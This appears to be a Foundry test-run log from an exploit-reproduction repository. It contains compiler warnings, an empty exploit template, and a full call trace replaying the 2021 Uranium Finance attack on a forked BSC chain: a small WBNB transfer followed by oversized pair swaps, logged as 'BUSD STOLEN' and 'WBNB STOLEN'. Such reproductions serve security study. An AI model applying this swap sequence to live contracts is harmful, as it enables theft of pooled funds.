Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 720.06ms (1.72ms CPU time)

Ran 1 test for src/test/2021-04/Uranium_exp.sol:Exploit
[PASS] testExploit() (gas: 155151)
Logs:
  WBNB start :  1000000000000000000
  BUSD STOLEN :  8593839914617657945464294
  WBNB STOLEN :  16217779701592608421862

Traces:
  [3644] Exploit::setUp()
    ├─ [0] VM::createSelectFork("bsc", 6920000 [6.92e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [180651] Exploit::testExploit()
    ├─ [23974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 1000000000000000000}()
    │   ├─ emit Deposit(dst: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 1000000000000000000 [1e18])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    ├─ [0] console::log("WBNB start : ", 1000000000000000000 [1e18]) [staticcall]
    │   └─ ← [Stop]
    ├─ [2564] 0xA943eA143cd7E79806d670f4a7cf08F8922a454F::getPair(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c) [staticcall]
    │   └─ ← [Return] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF
    ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF, 1000000000000000000 [1e18])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF, value: 1000000000000000000 [1e18])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0
    │   │   @ 0x036f52d3a6aced36a0cd50e2dac12bfb1fadbd04c2c1b71bd69b5272c2c36d91: 0x000000000000000000000000000000000000000000000377fe6e42fe843e1e9b → 0x0000000000000000000000000000000000000000000003780c4ef9b22ba21e9b
    │   └─ ← [Return] true
    ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF) [staticcall]
    │   └─ ← [Return] 8680647388502684793398277 [8.68e24]
    ├─ [2381] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF::token0() [staticcall]
    │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    ├─ [381] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF::token0() [staticcall]
    │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    ├─ [60359] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF::swap(0, 8593840914617657945464294 [8.593e24], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [27971] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8593840914617657945464294 [8.593e24])
    │   │   ├─ emit Transfer(from: 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 8593840914617657945464294 [8.593e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9611e1db72362f867a81956b4a27e8d59db747fd289a0541fc25294ca6ecaade: 0x000000000000000000000000000000000000000000072e32d67dfa3298216405 → 0x000000000000000000000000000000000000000000001261c9d32e05a03dc61f
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000071bd10caacc2cf7e39de6
    │   │   └─ ← [Return] true
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF) [staticcall]
    │   │   └─ ← [Return] 16381595658174351941275 [1.638e22]
    │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF) [staticcall]
    │   │   └─ ← [Return] 86806473885026847933983 [8.68e22]
    │   ├─ emit Sync(reserve0: 16381595658174351941275 [1.638e22], reserve1: 86806473885026847933983 [8.68e22])
    │   ├─ emit Swap(sender: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 1000000000000000000 [1e18], amount1In: 0, amount0Out: 0, amount1Out: 8593840914617657945464294 [8.593e24], to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x00000000000000000000000000001c6909ff5924f5a80d50cce712b5c0553019 → 0x00000000000000000000000000001c69ca83486eec7fd4b62918302cd101bd57
    │   │   @ 10: 0x0000000000000000000000000000000006ea3fe4aa41a94238f7db1e15a88d16 → 0x0000000000000000000000000000000006ea6cd1cb241342945daca9616cf705
    │   │   @ 8: 0x60878ea6000000072e32d67dfa3298216405000000000377fe6e42fe843e1e9b → 0x60878f03000000001261c9d32e05a03dc61f0000000003780c4ef9b22ba21e9b
    │   └─ ← [Stop]
    ├─ [2564] 0xA943eA143cd7E79806d670f4a7cf08F8922a454F::getPair(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56) [staticcall]
    │   └─ ← [Return] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF
    ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF, 1000000000000000000 [1e18])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF, value: 1000000000000000000 [1e18])
    │   ├─  storage changes:
    │   │   @ 0x9611e1db72362f867a81956b4a27e8d59db747fd289a0541fc25294ca6ecaade: 0x000000000000000000000000000000000000000000001261c9d32e05a03dc61f → 0x000000000000000000000000000000000000000000001261d7b3e4b947a1c61f
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000071bd10caacc2cf7e39de6 → 0x000000000000000000000000000000000000000000071bd0feca1579507f9de6
    │   └─ ← [Return] true
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF) [staticcall]
    │   └─ ← [Return] 16381595658174351941275 [1.638e22]
    ├─ [381] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF::token0() [staticcall]
    │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    ├─ [381] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF::token0() [staticcall]
    │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    ├─ [36334] 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF::swap(16217779701592608421862 [1.621e22], 0, Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 16217779701592608421862 [1.621e22])
    │   │   ├─ emit Transfer(from: 0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 16217779701592608421862 [1.621e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000036f2ae7c91e77ff37e6
    │   │   │   @ 0x036f52d3a6aced36a0cd50e2dac12bfb1fadbd04c2c1b71bd69b5272c2c36d91: 0x0000000000000000000000000000000000000000000003780c4ef9b22ba21e9b → 0x000000000000000000000000000000000000000000000008e1673093b3a2e6b5
    │   │   └─ ← [Return] true
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF) [staticcall]
    │   │   └─ ← [Return] 163815956581743519413 [1.638e20]
    │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x9B9baD4c6513E0fF3fB77c739359D59601c7cAfF) [staticcall]
    │   │   └─ ← [Return] 86807473885026847933983 [8.68e22]
    │   ├─ emit Sync(reserve0: 163815956581743519413 [1.638e20], reserve1: 86807473885026847933983 [8.68e22])
    │   ├─ emit Swap(sender: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 1000000000000000000 [1e18], amount0Out: 16217779701592608421862 [1.621e22], amount1Out: 0, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x60878f03000000001261c9d32e05a03dc61f0000000003780c4ef9b22ba21e9b → 0x60878f03000000001261d7b3e4b947a1c61f000000000008e1673093b3a2e6b5
    │   └─ ← [Stop]
    ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 8593839914617657945464294 [8.593e24]
    ├─ [0] console::log("BUSD STOLEN : ", 8593839914617657945464294 [8.593e24]) [staticcall]
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 16217779701592608421862 [1.621e22]
    ├─ [0] console::log("WBNB STOLEN : ", 16217779701592608421862 [1.621e22]) [staticcall]
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.26s (4.91s CPU time)

Ran 2 test suites in 7.28s (7.98s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
